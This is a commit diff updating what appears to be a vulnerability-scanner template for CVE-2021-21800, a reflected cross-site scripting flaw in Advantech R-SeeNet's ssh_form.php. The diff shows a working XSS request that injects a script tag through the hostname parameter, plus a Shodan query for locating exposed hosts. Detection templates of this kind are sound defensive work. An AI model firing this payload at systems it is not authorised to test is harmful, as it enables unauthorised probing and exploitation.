Update CVE-2021-21800.yaml
parent
75e5232ac3
commit
99c4f1bb38
|
@ -7,29 +7,30 @@ info:
|
||||||
description: |
|
description: |
|
||||||
Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality.
|
Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality.
|
||||||
reference:
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
|
|
||||||
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21800
|
||||||
metadata:
|
metadata:
|
||||||
shodan-query: http.html:"R-SeeNet"
|
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: xss,cve,2021,unauthenticated
|
shodan-query: http.html:"R-SeeNet"
|
||||||
|
tags: cve,cve2021,xss
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ctitle%3E"
|
- "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
|
||||||
words:
|
words:
|
||||||
- '<script>alert(1)</script>'
|
- "</title><script>alert(document.domain)</script><title>"
|
||||||
|
part: body
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
|
||||||
words:
|
words:
|
||||||
- text/html
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
Loading…
Reference in New Issue